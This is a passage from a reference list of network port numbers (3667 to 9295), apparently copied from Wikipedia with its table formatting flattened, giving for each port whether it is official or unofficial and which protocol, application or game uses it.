Server[11] Unofficial Battlefield 4 3667 Yes Yes Information Exchange 3671 Yes Yes KNXnet/IP(EIBnet/IP) 3689 Yes Assigned Digital Audio Access Protocol (DAAP), used by Apple’s iTunes and AirPlay[11] 3690 Yes Yes Subversion (SVN)[11] version control system 3702 Yes Yes Web Services Dynamic Discovery (WS-Discovery), used by various components of Windows Vista and later 3724 Yes Yes Some Blizzard games[124] Unofficial Club Penguin Disney online game for kids 3725 Yes Yes Netia NA-ER Port 3749 Yes Yes CimTrak registered port 3768 Yes Yes RBLcheckd server daemon 3784 Yes Bidirectional Forwarding Detection (BFD)for IPv4 and IPv6 (Single Hop) (RFC 5881) 3785 Unofficial VoIP program used by Ventrilo 3799 Yes RADIUS change of authorization 3804 Yes Yes Harman Professional HiQnet protocol 3825 Unofficial RedSeal Networks client/server connection[citation needed] 3826 Yes Yes WarMUX game server Unofficial RedSeal Networks client/server connection[citation needed] 3835 Unofficial RedSeal Networks client/server connection[citation needed] 3830 Yes Yes System Management Agent, developed and used by Cerner to monitor and manage solutions 3856 Unofficial Unofficial ERP Server Application used by F10 Software 3880 Yes Yes IGRS 3868 Yes Yes Diameter base protocol (RFC 3588) 3872 Yes Oracle Enterprise Manager Remote Agent 3900 Yes udt_os, IBM UniData UDT OS[196] 3960 Unofficial Warframe online interaction[citation needed] 3962 Unofficial Warframe online interaction[citation needed] 3978 Unofficial Unofficial OpenTTD game (masterserver and content service) 3978 Unofficial Palo Alto Networks’ Panorama management of firewalls and log collectors & pre-PAN-OS 8.0 Panorama-to-managed devices software updates.[197] 3979 Unofficial Unofficial OpenTTD game 3999 Yes Yes Norman distributed scanning service 4000 Unofficial Unofficial Diablo II game 4001 Unofficial Microsoft Ants game Unofficial CoreOS etcd client communication 4018 Yes Yes Protocol information and warnings[clarification needed] 4035 Unofficial IBM Rational Developer for System z Remote System Explorer Daemon 4045 Unofficial Unofficial Solaris lockd NFS lock daemon/manager 4050 Unofficial Mud Master Chat protocol (MMCP) — Peer-to-peer communications between MUD clients.[198] 4069 Yes Minger Email Address Verification Protocol[199] 4070 Unofficial Unofficial Amazon Echo Dot (Amazon Alexa) streaming connection with Spotify[200] 4089 Yes Yes OpenCORE Remote Control Service 4090 Yes Yes Kerio 4093 Yes Yes PxPlus Client server interface ProvideX 4096 Yes Yes Ascom Timeplex Bridge Relay Element (BRE) 4105 Yes Yes Shofar (ShofarNexus) 4111 Yes Assigned Xgrid[11] 4116 Yes Yes Smartcard-TLS 4125 Unofficial Microsoft Remote Web Workplace administration 4172 Yes Yes Teradici PCoIP 4190 Yes ManageSieve[201] 4195 Yes Yes Yes Yes AWS protocol for cloud remoting solution 4197 Yes Yes Harman International’s HControl protocol for control and monitoring of Audio, Video, Lighting and Control equipment 4198 Unofficial Unofficial Couch Potato Android app[202] 4200 Unofficial Angular app 4201 Unofficial TinyMUD and various derivatives 4222 Unofficial NATS server default port[203] 4226 Unofficial Unofficial Aleph One, a computer game 4242 Unofficial Orthanc – DICOM server[204] Unofficial Quassel distributed IRC client 4243 Unofficial Docker implementations, redistributions, and setups default[205][needs update?] Unofficial CrashPlan 4244 Unofficial Unofficial Viber[206] 4303 Yes Yes Simple Railroad Command Protocol (SRCP) 4307 Yes TrueConf Client — TrueConf Server media data exchange[207] 4321 Yes Referral Whois (RWhois) Protocol[208] 4444 Unofficial Unofficial Oracle WebCenter Content: Content Server—Intradoc Socket port. (formerly known as Oracle Universal Content Management). Unofficial Metasploit’s default listener port[209] Unofficial Unofficial Xvfb X server virtual frame buffer service Unofficial OpenOCD (Telnet)[187] 4444–4445 Unofficial I2P HTTP/S proxy 4486 Yes Yes Integrated Client Message Service (ICMS) 4488 Yes Assigned Apple Wide Area Connectivity Service, used by Back to My Mac[11] 4500 Assigned Yes IPSec NAT Traversal[11] (RFC 3947, RFC 4306) 4502–4534 Yes Microsoft Silverlight connectable ports under non-elevated trust 4505–4506 Unofficial Salt master 4534 Unofficial Armagetron Advanced server default 4560 Unofficial default Log4j socketappender port 4567 Unofficial Sinatra default server port in development mode (HTTP) 4569 Yes Inter-Asterisk eXchange (IAX2) 4604 Yes Identity Registration Protocol 4605 Yes Direct End to End Secure Chat Protocol 4610–4640 Unofficial QualiSystems TestShell Suite Services 4662 Yes Yes OrbitNet Message Service Unofficial Default for older versions of eMule[210] 4664 Unofficial Google Desktop Search 4672 Unofficial Default for older versions of eMule[210] 4711 Unofficial eMule optional web interface[210] 4713 Unofficial PulseAudio sound server 4723 Unofficial Appium open source automation tool 4724 Unofficial Default bootstrap port to use on device to talk to Appium 4728 Yes Computer Associates Desktop and Server Management (DMP)/Port Multiplexer[211] 4730 Yes Yes Gearman’s job server 4739 Yes Yes IP Flow Information Export 4747 Unofficial Apprentice 4753 Yes Yes SIMON (service and discovery) 4789 Yes Virtual eXtensible Local Area Network (VXLAN) 4791 Yes IP Routable RocE (RoCEv2) 4840 Yes Yes OPC UA Connection Protocol (TCP) and OPC UA Multicast Datagram Protocol (UDP) for OPC Unified Architecture from OPC Foundation 4843 Yes Yes OPC UA TCP Protocol over TLS/SSL for OPC Unified Architecture from OPC Foundation 4847 Yes Yes Web Fresh Communication, Quadrion Software & Odorless Entertainment 4848 Unofficial Java, Glassfish Application Server administration default 4894 Yes Yes LysKOM Protocol A 4944 No Unofficial DrayTek DSL Status Monitoring[212] 4949 Yes Munin Resource Monitoring Tool 4950 Yes Yes Cylon Controls UC32 Communications Port 5000 Unofficial UPnP—Windows network device interoperability Unofficial Unofficial VTun, VPN Software Unofficial ASP.NET Core — Development Webserver Unofficial FlightGear multiplayer[213] Unofficial Synology Inc. Management Console, File Station, Audio Station Unofficial Flask Development Webserver Unofficial Heroku console access Unofficial Docker Registry[214] Unofficial AT&T U-verse public, educational, and government access (PEG) streaming over HTTP[215] Unofficial High-Speed SECS Message Services[citation needed] Unofficial 3CX Phone System Management Console/Web Client (HTTP) Unofficial RidgeRun GStreamer Daemon (GSTD) [216] Unofficial Apple’s AirPlay Receiver[217] 5000–5500 No Unofficial League of Legends, a multiplayer online battle arena video game[218] 5001 Unofficial Slingbox and Slingplayer Unofficial Unofficial Iperf (Tool for measuring TCP and UDP bandwidth performance) Unofficial Synology Inc. Secured Management Console, File Station, Audio Station Unofficial 3CX Phone System Management Console/Web Client (HTTPS) 5002 Unofficial ASSA ARX access control system[219] 5003 Yes Assigned FileMaker – name binding and transport[11] 5004 Yes Yes Yes Real-time Transport Protocol media data (RTP) (RFC 3551, RFC 4571) 5005 Yes Yes Yes Real-time Transport Protocol control protocol (RTCP) (RFC 3551, RFC 4571) 5007 Unofficial Palo Alto Networks — User-ID agent 5010 Yes Yes Registered to: TelePath (the IBM FlowMark workflow-management system messaging platform)[220]
The TCP port is now used for: IBM WebSphere MQ Workflow 5011 Yes Yes TelePath (the IBM FlowMark workflow-management system messaging platform)[220] 5022 Unofficial MSSQL Server Replication and Database mirroring endpoints[221] 5025 Yes Yes scpi-raw Standard Commands for Programmable Instruments 5029 Unofficial Sonic Robo Blast 2 and Sonic Robo Blast 2 Kart servers 5031 Unofficial Unofficial AVM CAPI-over-TCP (ISDN over Ethernet tunneling)[citation needed] 5037 Unofficial Android ADB server 5044 Yes Standard port in Filebeats/Logstash implementation of Lumberjack protocol. 5048 Yes Texai Message Service 5050 Unofficial Yahoo! Messenger 5051 Yes ita-agent Symantec Intruder Alert[222] 5060 Yes Yes Session Initiation Protocol (SIP)[11] 5061 Yes[223] Session Initiation Protocol (SIP) over TLS 5062 Yes Yes Localisation access 5064 Yes Yes EPICS Channel Access server[224] 5065 Assigned Yes EPICS Channel Access repeater beacon[224] 5070 Unofficial No Binary Floor Control Protocol (BFCP)[225] 5080 Unofficial Unofficial List of telephone switches#NEC[NEC Phone System] NEC SV8100 and SV9100 MLC Phones Default iSIP Port 5084 Yes Yes EPCglobal Low Level Reader Protocol (LLRP) 5085 Yes Yes EPCglobal Low Level Reader Protocol (LLRP) over TLS 5090 Unofficial Unofficial 3CX Phone System 3CX Tunnel Protocol, 3CX App API, 3CX Session Border Controller 5093 Yes SafeNet, Inc Sentinel LM, Sentinel RMS, License Manager, client-to-server 5099 Yes Yes SafeNet, Inc Sentinel LM, Sentinel RMS, License Manager, server-to-server 5104 Unofficial IBM Tivoli Framework NetCOOL/Impact[226] HTTP Service 5121 Unofficial Neverwinter Nights 5124 Unofficial Unofficial TorgaNET (Micronational Darknet) 5125 Unofficial Unofficial TorgaNET (Micronational Intelligence Darknet) 5150 Yes Yes ATMP Ascend Tunnel Management Protocol[227] 5151 Yes ESRI SDE Instance Yes ESRI SDE Remote Start 5154 Yes Yes BZFlag 5172 Yes PC over IP Endpoint Management[228] 5173 Unofficial Vite 5190 Yes Yes AOL Instant Messenger protocol.[11] The chat app is defunct as of 15 December 2017.[229] 5198 Unofficial EchoLink VoIP Amateur Radio Software (Voice) 5199 Unofficial EchoLink VoIP Amateur Radio Software (Voice) 5200 Unofficial EchoLink VoIP Amateur Radio Software (Information) 5201 Unofficial Unofficial Iperf3 (Tool for measuring TCP and UDP bandwidth performance) 5222 Yes Reserved Extensible Messaging and Presence Protocol (XMPP) client connection[11][230][231] 5223 Unofficial Apple Push Notification Service[11][157] Unofficial Extensible Messaging and Presence Protocol (XMPP) client connection over SSL 5228 Yes HP Virtual Room Service Unofficial Google Play, Android Cloud to Device Messaging Service, Google Cloud Messaging 5242 Unofficial Unofficial Viber[206] 5243 Unofficial Unofficial Viber[206] 5246 Yes Control And Provisioning of Wireless Access Points (CAPWAP) CAPWAP control[232] 5247 Yes Control And Provisioning of Wireless Access Points (CAPWAP) CAPWAP data[232] 5269 Yes Extensible Messaging and Presence Protocol (XMPP) server-to-server connection[11][230][231] 5280 Yes Extensible Messaging and Presence Protocol (XMPP)[233] 5281 Unofficial Extensible Messaging and Presence Protocol (XMPP)[234] 5298 Yes Yes Extensible Messaging and Presence Protocol (XMPP)[235] 5310 Assigned Yes Outlaws, a 1997 first-person shooter video game[236] 5318 Yes Reserved Certificate Management over CMS[237] 5349 Yes Yes STUN over TLS/DTLS, a protocol for NAT traversal[189] Yes Yes TURN over TLS/DTLS, a protocol for NAT traversal[190] Yes Reserved STUN Behavior Discovery over TLS.[191] See also port 3478. 5351 Reserved Yes NAT Port Mapping Protocol and Port Control Protocol—client-requested configuration for connections through network address translators and firewalls 5353 Assigned Yes Multicast DNS (mDNS)[11] 5355 Yes Yes Link-Local Multicast Name Resolution (LLMNR), allows hosts to perform name resolution for hosts on the same local link (only provided by Windows Vista and Server 2008) 5357 Unofficial Unofficial Web Services for Devices (WSDAPI) (only provided by Windows Vista, Windows 7 and Server 2008) 5358 Unofficial Unofficial WSDAPI Applications to Use a Secure Channel (only provided by Windows Vista, Windows 7 and Server 2008) 5394 Unofficial Kega Fusion, a Sega multi-console emulator[238][239] 5402 Yes Yes Multicast File Transfer Protocol (MFTP)[240][importance?] 5405 Yes Yes NetSupport Manager 5412 Yes Yes IBM Rational Synergy (Telelogic Synergy) (Continuus CM) Message Router 5413 Yes Yes Wonderware SuiteLink service 5417 Yes Yes SNS Agent 5421 Yes Yes NetSupport Manager 5432 Yes Assigned PostgreSQL[11] database system 5433 Unofficial Bouwsoft file/webserver[241] 5445 Unofficial Cisco Unified Video Advantage[citation needed] 5450 Unofficial Unofficial OSIsoft PI Server Client Access [242] 5457 Unofficial OSIsoft PI Asset Framework Client Access [243] 5458 Unofficial OSIsoft PI Notifications Client Access [244] 5480 Unofficial VMware VAMI (Virtual Appliance Management Infrastructure)—used for initial setup of various administration settings on Virtual Appliances designed using the VAMI architecture. 5481 Unofficial Schneider Electric’s ClearSCADA (SCADA implementation for Windows) — used for client-to-server communication.[245] 5495 Unofficial IBM Cognos TM1 Admin server 5498 Unofficial Hotline tracker server connection 5499 Unofficial Hotline tracker server discovery 5500 Unofficial Hotline control connection Unofficial VNC Remote Frame Buffer RFB protocol—for incoming listening viewer 5501 Unofficial Hotline file transfer connection 5517 Unofficial Setiqueue Proxy server client for SETI@Home project 5550 Unofficial Hewlett-Packard Data Protector[citation needed] 5554 Unofficial Unofficial Fastboot default wireless port 5555 Unofficial Unofficial Oracle WebCenter Content: Inbound Refinery—Intradoc Socket port. (formerly known as Oracle Universal Content Management). Port though often changed during installation Unofficial Freeciv versions up to 2.0, Hewlett-Packard Data Protector, McAfee EndPoint Encryption Database Server, SAP, Default for Microsoft Dynamics CRM 4.0, Softether VPN default port 5556 Yes Yes Freeciv, Oracle WebLogic Server Node Manager[246] 5568 Yes Yes Session Data Transport (SDT), a part of Architecture for Control Networks (ACN)[247][full citation needed] 5601 Unofficial Kibana[248] 5631 Yes pcANYWHEREdata, Symantec pcAnywhere (version 7.52 and later[249])[250] data 5632 Yes pcANYWHEREstat, Symantec pcAnywhere (version 7.52 and later) status 5656 Unofficial IBM Lotus Sametime p2p file transfer 5666 Unofficial NRPE (Nagios) 5667 Unofficial NSCA (Nagios) 5670 Yes FILEMQ ZeroMQ File Message Queuing Protocol Yes ZRE-DISC ZeroMQ Realtime Exchange Protocol (Discovery) 5671 Yes Assigned Advanced Message Queuing Protocol (AMQP)[251] over TLS 5672 Yes Assigned Yes Advanced Message Queuing Protocol (AMQP)[251] 5678 Unofficial No n8n[252] 5683 Yes Yes Constrained Application Protocol (CoAP) 5684 Yes Yes Constrained Application Protocol Secure (CoAPs) 5693 Unofficial Nagios Cross Platform Agent (NCPA)[253] 5701 Unofficial Hazelcast default communication port[254] 5718 Unofficial Microsoft DPM Data Channel (with the agent coordinator) 5719 Unofficial Microsoft DPM Data Channel (with the protection agent) 5722 Yes Yes Microsoft RPC, DFSR (SYSVOL) Replication Service[citation needed] 5723 Unofficial System Center Operations Manager[255] 5724 Unofficial Operations Manager Console 5741 Yes Yes IDA Discover Port 1 5742 Yes Yes IDA Discover Port 2 5800 Unofficial VNC Remote Frame Buffer RFB protocol over HTTP Unofficial ProjectWise Server[256] 5900 Yes Yes Remote Frame Buffer protocol (RFB) Unofficial Virtual Network Computing (VNC) Remote Frame Buffer RFB protocol[11][257] 5905 Unofficial Windows service «C:Program FilesIntelIntel(R) Online Connect AccessIntelTechnologyAccessService.exe» that listens on 127.0.0.1 5931 Yes Yes AMMYY admin Remote Control 5938 Unofficial Unofficial TeamViewer remote desktop protocol[258] 5984 Yes Yes CouchDB database server 5985 Yes Windows PowerShell Default psSession Port[259] Windows Remote Management Service (WinRM-HTTP)[260] 5986 Yes Windows PowerShell Default psSession Port[259] Windows Remote Management Service (WinRM-HTTPS)[260] 5988–5989 Yes CIM-XML (DMTF Protocol)[261] 6000–6063 Yes Yes X11—used between an X client and server over the network 6005 Unofficial Default for BMC Software Control-M/Server—Socket used for communication between Control-M processes—though often changed during installation Unofficial Default for Camfrog chat & cam client 6009 Unofficial JD Edwards EnterpriseOne ERP system JDENet messaging client listener 6050 Unofficial Arcserve backup 6051 Unofficial Arcserve backup 6086 Yes Peer Distributed Transfer Protocol (PDTP), FTP like file server in a P2P network 6100 Unofficial Vizrt System Unofficial Ventrilo authentication for version 3 6101 Unofficial Backup Exec Agent Browser[citation needed] 6110 Yes Yes softcm, HP Softbench CM 6111 Yes Yes spc, HP Softbench Sub-Process Control 6112 Yes Yes dtspcd, execute commands and launch applications remotely Unofficial Unofficial Blizzard’s Battle.net gaming service and some games,[124] ArenaNet gaming service, Relic gaming service Unofficial Club Penguin Disney online game for kids 6113 Unofficial Club Penguin Disney online game for kids, Used by some Blizzard games[124] 6136 Unofficial ObjectDB database server[262] 6159 Yes ARINC 840 EFB Application Control Interface 6160 Unofficial Veeam Installer Service 6161 Unofficial Veeam vPower NFS Service 6162 Unofficial Veeam Data Mover 6163 Unofficial Veeam Hyper-V Integration Service 6164 Unofficial Veeam WAN Accelerator 6165 Unofficial Veeam WAN Accelerator Data Transfer 6167 Unofficial Veeam Log Shipping Service 6170 Unofficial Veeam Mount Server 6200 Unofficial Oracle WebCenter Content Portable: Content Server (With Native UI) and Inbound Refinery 6201 Assigned Thermo-Calc Software AB: Management of service nodes in a processing grid for thermodynamic calculations Unofficial Oracle WebCenter Content Portable: Admin 6225 Unofficial Oracle WebCenter Content Portable: Content Server Web UI 6227 Unofficial Oracle WebCenter Content Portable: JavaDB 6240 Unofficial Oracle WebCenter Content Portable: Capture 6244 Unofficial Unofficial Oracle WebCenter Content Portable: Content Server—Intradoc Socket port 6255 Unofficial Unofficial Oracle WebCenter Content Portable: Inbound Refinery—Intradoc Socket port 6257 Unofficial WinMX (see also 6699) 6260 Unofficial Unofficial planet M.U.L.E. 6262 Unofficial Sybase Advantage Database Server 6343 Yes SFlow, sFlow traffic monitoring 6346 Yes gnutella-svc, gnutella (FrostWire, Limewire, Shareaza, etc.) 6347 Yes gnutella-rtr, Gnutella alternate 6350 Yes App Discovery and Access Protocol 6379 Yes Redis key-value data store 6389 Unofficial EMC CLARiiON 6432 Yes PgBouncer—A connection pooler for PostgreSQL 6436 Unofficial Leap Motion Websocket Server TLS 6437 Unofficial Leap Motion Websocket Server 6443 Yes Kubernetes API server [263] 6444 Yes Sun Grid Engine Qmaster Service 6445 Yes Sun Grid Engine Execution Service 6454 Unofficial Art-Net protocol 6463–6472 Unofficial Discord RPC[264] 6464 Yes Port assignment for medical device communication in accordance to IEEE 11073-20701 6513 Yes NETCONF over TLS 6514 Yes Syslog over TLS[265] 6515 Yes Elipse RPC Protocol (REC) 6516 Unofficial Windows Admin Center 6543 Unofficial Pylons project#Pyramid Default Pylons Pyramid web service port 6556 Unofficial Check MK Agent 6566 Yes SANE (Scanner Access Now Easy)—SANE network scanner daemon[266] 6560–6561 Unofficial Speech-Dispatcher daemon[citation needed] 6571 Unofficial Windows Live FolderShare client 6600 Yes Microsoft Hyper-V Live Unofficial Music Player Daemon (MPD) 6601 Yes Microsoft Forefront Threat Management Gateway 6602 Yes Microsoft Windows WSS Communication 6619 Yes odette-ftps, Odette File Transfer Protocol (OFTP) over TLS/SSL 6622 Yes Multicast FTP 6653 Yes Assigned OpenFlow[citation needed] 6660–6664 Unofficial Internet Relay Chat (IRC) 6665–6669 Yes Internet Relay Chat (IRC) 6679 Yes Osorno Automation Protocol (OSAUT) Unofficial Internet Relay Chat (IRC) SSL (Secure Internet Relay Chat)—often used 6690 Unofficial Synology Cloud station 6697 Yes IRC SSL (Secure Internet Relay Chat)—often used 6699 Unofficial WinMX (see also 6257) 6715 Unofficial AberMUD and derivatives default port 6771 Unofficial BitTorrent Local Peer Discovery 6783–6785 Unofficial Splashtop Remote server broadcast 6801 Yes ACNET Control System Protocol 6881–6887 Unofficial Unofficial BitTorrent beginning of range of ports used most often 6888 Yes MUSE Unofficial Unofficial BitTorrent continuation of range of ports used most often 6889–6890 Unofficial Unofficial BitTorrent continuation of range of ports used most often 6891–6900 Unofficial Unofficial BitTorrent continuation of range of ports used most often 6891–6900 Unofficial Unofficial Windows Live Messenger (File transfer) 6901 Unofficial Unofficial Windows Live Messenger (Voice) Unofficial Unofficial BitTorrent continuation of range of ports used most often 6902–6968 Unofficial Unofficial BitTorrent continuation of range of ports used most often 6924 Yes split-ping, ping with RX/TX latency/loss split 6969 Yes acmsoda Unofficial BitTorrent tracker 6970–6999 Unofficial Unofficial BitTorrent end of range of ports used most often Unofficial QuickTime Streaming Server[11] 6980 Unofficial Voicemeeter VBAN network audio protocol[267] 7000 Unofficial Default for Vuze’s built-in HTTPS Bittorrent tracker Unofficial Avira Server Management Console 7001 Unofficial Avira Server Management Console Unofficial Default for BEA WebLogic Server’s HTTP server, though often changed during installation 7002 Unofficial Default for BEA WebLogic Server’s HTTPS server, though often changed during installation 7005 Unofficial Default for BMC Software Control-M/Server and Control-M/Agent for Agent-to-Server, though often changed during installation 7006 Unofficial Default for BMC Software Control-M/Server and Control-M/Agent for Server-to-Agent, though often changed during installation 7010 Unofficial Default for Cisco AON AMC (AON Management Console)[268] 7022 Unofficial Database mirroring endpoints[221] 7023 Yes Bryan Wilcutt T2-NMCS Protocol for SatCom Modems 7025 Unofficial Zimbra LMTP [mailbox]—local mail delivery 7047 Unofficial Zimbra conversion server 7070 Unofficial Unofficial Real Time Streaming Protocol (RTSP), used by QuickTime Streaming Server. TCP is used by default, UDP is used as an alternate.[11] 7077 Yes Development-Network Authentification-Protocol 7133 Unofficial Enemy Territory: Quake Wars 7144 Unofficial Peercast[citation needed] 7145 Unofficial Peercast[citation needed] 7171 Unofficial Tibia 7262 Yes CNAP (Calypso Network Access Protocol) 7272 Yes WatchMe — WatchMe Monitoring 7306 Unofficial Zimbra mysql [mailbox][citation needed] 7307 Unofficial Zimbra mysql [logger][citation needed] 7312 Unofficial Sibelius License Server 7396 Unofficial Web control interface for Folding@home v7.3.6 and later[269] 7400 Yes RTPS (Real Time Publish Subscribe) DDS Discovery 7401 Yes RTPS (Real Time Publish Subscribe) DDS User-Traffic 7402 Yes RTPS (Real Time Publish Subscribe) DDS Meta-Traffic 7471 Unofficial Stateless Transport Tunneling (STT) 7473 Yes Rise: The Vieneo Province 7474 Yes Neo4J Server webadmin[270] 7478 Yes Default port used by Open iT Server.[271] 7542 Yes Saratoga file transfer protocol[272][273] 7547 Yes CPE WAN Management Protocol (CWMP) Technical Report 069 7575 Unofficial Populous: The Beginning server 7624 Yes Instrument Neutral Distributed Interface 7631 Yes ERLPhase 7634 Unofficial hddtemp—Utility to monitor hard drive temperature 7652–7654 Unofficial I2P anonymizing overlay network 7655 Unofficial I2P SAM Bridge Socket API 7656–7660 Unofficial I2P anonymizing overlay network 7670 Unofficial BrettspielWelt BSW Boardgame Portal 7680 Unofficial Delivery Optimization for Windows 10[274] 7687 Yes Bolt database connection 7707–7708 Unofficial Killing Floor 7717 Unofficial Killing Floor 7777 Unofficial iChat server file transfer proxy[11] Unofficial Oracle Cluster File System 2[citation needed] Unofficial Windows backdoor program tini.exe default[citation needed] Unofficial Just Cause 2: Multiplayer Mod Server[citation needed] Unofficial Terraria default server Unofficial San Andreas Multiplayer (SA-MP) default port server Unofficial SCP: Secret Laboratory Multiplayer Server 7777–7788 Unofficial Unofficial Unreal Tournament series default server[citation needed] 7831 Unofficial Default used by Smartlaunch Internet Cafe Administration[275] software 7880 Unofficial Unofficial PowerSchool Gradebook Server[citation needed] 7890 Unofficial Default that will be used by the iControl Internet Cafe Suite Administration software 7915 Unofficial Default for YSFlight server[276] 7935 Unofficial Fixed port used for Adobe Flash Debug Player to communicate with a debugger (Flash IDE, Flex Builder or fdb).[277] 7946 Unofficial Unofficial Docker Swarm communication among nodes[164] 7979 Unofficial Used by SilverBluff Studios for communication between servers and clients.[citation needed] 7990 Unofficial Atlassian Bitbucket (default port)[citation needed] 8000 Unofficial Commonly used for Internet radio streams such as SHOUTcast[citation needed], Icecast[citation needed] and iTunes Radio[11] Unofficial DynamoDB Local[278] Unofficial Django Development Webserver[279] Unofficial Python 3 http.server[280] 8005 Unofficial Tomcat remote shutdown[11] Unofficial PLATO ASCII protocol (RFC 600) Unofficial Windows SCCM HTTP listener service[281] 8006 Unofficial Quest AppAssure 5 API[282] Unofficial No Proxmox Virtual Environment admin web interface[283] 8007 Unofficial Quest AppAssure 5 Engine[282] 8007 Yes Proxmox Backup Server admin web interface 8008 Unofficial Unofficial Alternative port for HTTP. See also ports 80 and 8080. Unofficial IBM HTTP Server administration default[importance?] Unofficial iCal, a calendar application by Apple[11] Unofficial No Matrix homeserver federation over HTTP[284] 8009 Unofficial Apache JServ Protocol (ajp13)[citation needed] 8010 Unofficial No Buildbot web status page[citation needed] 8042 Unofficial Orthanc – REST API over HTTP[204] 8069 Unofficial OpenERP 5.0 XML-RPC protocol[285] 8070 Unofficial OpenERP 5.0 NET-RPC protocol[285] 8074 Yes Gadu-Gadu 8075 Unofficial Killing Floor web administration interface[citation needed] 8080 Yes Alternative port for HTTP. See also ports 80 and 8008. Unofficial Apache Tomcat[286] Unofficial Atlassian JIRA applications[287] 8081 Yes Yes Sun Proxy Admin Service[288] 8088 Unofficial Asterisk management access via HTTP[citation needed] 8089 Unofficial No Splunk daemon management[289] Unofficial Fritz!Box automatic TR-069 configuration[290] 8090 Unofficial Atlassian Confluence[291] Unofficial Coral Content Distribution Network (legacy; 80 and 8080 now supported)[292] Unofficial Matrix identity server[citation needed] 8091 Unofficial CouchBase web administration[293] 8092 Unofficial CouchBase API[293] 8096 Unofficial Emby and Jellyfin HTTP port[294] 8111 Unofficial JOSM Remote Control 8112 Unofficial PAC Pacifica Coin 8116 Unofficial Check Point Cluster Control Protocol 8118 Yes Privoxy—advertisement-filtering Web proxy 8123 Unofficial Polipo Web proxy Unofficial Home Assistant Home automation Unofficial BURST P2P[295] 8124 Unofficial Standard BURST Mining Pool Software Port 8125 Unofficial BURST Web Interface 8139 Unofficial Puppet (software) Client agent 8140 Yes Puppet (software) Master server 8172 Unofficial Microsoft Remote Administration for IIS Manager[296] 8184 Unofficial NCSA Brown Dog Data Access Proxy 8194–8195 Yes Bloomberg Terminal[297] 8200 Unofficial GoToMyPC Unofficial MiniDLNA media server Web Interface 8222 Unofficial VMware VI Web Access via HTTP[298] 8243 Yes HTTPS listener for Apache Synapse[299] 8245 Unofficial Dynamic DNS for at least No-IP and DynDNS[300] 8280 Yes HTTP listener for Apache Synapse[299] 8281 Unofficial HTTP Listener for Gatecraft Plugin 8291 Unofficial Winbox—Default on a MikroTik RouterOS for a Windows application used to administer MikroTik RouterOS[301] 8303 Unofficial Teeworlds Server 8332 Unofficial Bitcoin JSON-RPC server[302] 8333 Unofficial Bitcoin[303] Unofficial VMware VI Web Access via HTTPS[298] 8334 Unofficial Filestash server (default) [304] 8337 Unofficial VisualSVN Distributed File System Service (VDFS)[305] 8384 Unofficial Syncthing web GUI 8388 Unofficial Shadowsocks proxy server[citation needed] 8400 Yes Commvault Communications Service (GxCVD, found in all client computers) 8401 Yes Commvault Server Event Manager (GxEvMgrS, available in CommServe) 8403 Yes Commvault Firewall (GxFWD, tunnel port for HTTP/HTTPS) 8443 Unofficial SW Soft Plesk Control Panel Unofficial Apache Tomcat SSL Unofficial Promise WebPAM SSL Unofficial iCal over SSL[11] Unofficial MineOs WebUi 8444 Unofficial Bitmessage 8448 Unofficial No Matrix homeserver federation over HTTPS[284] 8484 Unofficial MapleStory Login Server 8500 Unofficial Adobe ColdFusion built-in web server[306] 8530 Unofficial Windows Server Update Services over HTTP, when using the default role installation settings in Windows Server 2012 and later versions.[307][308] 8531 Unofficial Windows Server Update Services over HTTPS, when using the default role installation settings in Windows Server 2012 and later versions.[307][308] 8555 Unofficial Symantec DLP OCR Engine [309] 8580 Unofficial Freegate, an Internet anonymizer and proxy tool[310] 8629 Unofficial Tibero database[citation needed] 8642 Unofficial Lotus Notes Traveler auto synchronization for Windows Mobile and Nokia devices[311] 8691 Unofficial Ultra Fractal, a fractal generation and rendering software application – distributed calculations over networked computers[312][313] 8765 Unofficial No Default port of a local GUN relay peer that the Internet Archive[314] and others use as a decentralized mirror for censorship resistance.[315] 8767 Unofficial Voice channel of TeamSpeak 2,[316] a proprietary Voice over IP protocol targeted at gamers[citation needed] 8834 Unofficial Nessus, a vulnerability scanner – remote XML-RPC web server[317][third-party source needed] 8840 Unofficial Opera Unite, an extensible framework for web applications[318][319] 8880 Yes Alternate port of CDDB (Compact Disc Database) protocol, used to look up audio CD (compact disc) information over the Internet.[320] See also port 888. Unofficial IBM WebSphere Application Server SOAP connector[321][jargon] 8883 Yes Secure MQTT (MQTT over TLS)[322][323] 8887 Unofficial HyperVM over HTTP[citation needed] 8888 Unofficial HyperVM over HTTPS[citation needed] Unofficial No Freenet web UI (localhost only)[citation needed] Unofficial Default for IPython[324] / Jupyter[325] notebook dashboards Unofficial MAMP[326] 8889 Unofficial MAMP[326] 8920 Unofficial Jellyfin HTTPS port[294] 8983 Unofficial Apache Solr[327] 8997 Unofficial Alternate port for I2P Monotone Proxy[175][jargon] 8998 Unofficial I2P Monotone Proxy[175][jargon] 8999 Unofficial Alternate port for I2P Monotone Proxy[175][jargon] 9000 Unofficial SonarQube Web Server[328] Unofficial ClickHouse default port Unofficial DBGp Unofficial SqueezeCenter web server & streaming Unofficial UDPCast Unofficial Play Framework web server[329] Unofficial Hadoop NameNode default port Unofficial PHP-FPM default port Unofficial QBittorrent’s embedded torrent tracker default port[330] 9001 Yes ETL Service Manager[331] Unofficial Microsoft SharePoint authoring environment Unofficial cisco-xremote router configuration[citation needed] Unofficial Tor network default Unofficial DBGp Proxy Unofficial HSQLDB default port 9002 Unofficial Newforma Server comms 9006 Reserved[2] Unofficial Tomcat in standalone mode[11] 9030 Unofficial Tor often used 9042 Unofficial Apache Cassandra native protocol clients 9043 Unofficial WebSphere Application Server Administration Console secure 9050–9051 Unofficial Tor (SOCKS-5 proxy client) 9060 Unofficial WebSphere Application Server Administration Console 9080 Yes glrpc, Groove Collaboration software GLRPC Unofficial WebSphere Application Server HTTP Transport (port 1) default Unofficial Remote Potato by FatAttitude, Windows Media Center addon Unofficial ServerWMC, Windows Media Center addon 9081 Unofficial Zerto ZVM to ZVM communication 9090 Unofficial Prometheus metrics server Unofficial Openfire Administration Console Unofficial SqueezeCenter control (CLI) Unofficial Cherokee Admin Panel 9091 Unofficial Openfire Administration Console (SSL Secured) Unofficial Transmission (BitTorrent client) Web Interface 9092 Unofficial H2 (DBMS) Database Server Unofficial Apache Kafka A Distributed Streaming Platform[332] 9100 Yes Assigned PDL Data Stream, used for printing to certain network printers[11] 9101 Yes Bacula Director 9102 Yes Bacula File Daemon 9103 Yes Bacula Storage Daemon 9119 Yes MXit Instant Messenger 9150 Unofficial Tor Browser 9191 Unofficial Sierra Wireless Airlink 9199 Unofficial Avtex LLC—qStats 9200 Unofficial Elasticsearch[333]—default Elasticsearch port 9217 Unofficial iPass Platform Service 9293 Unofficial Sony PlayStation RemotePlay[334] 9295 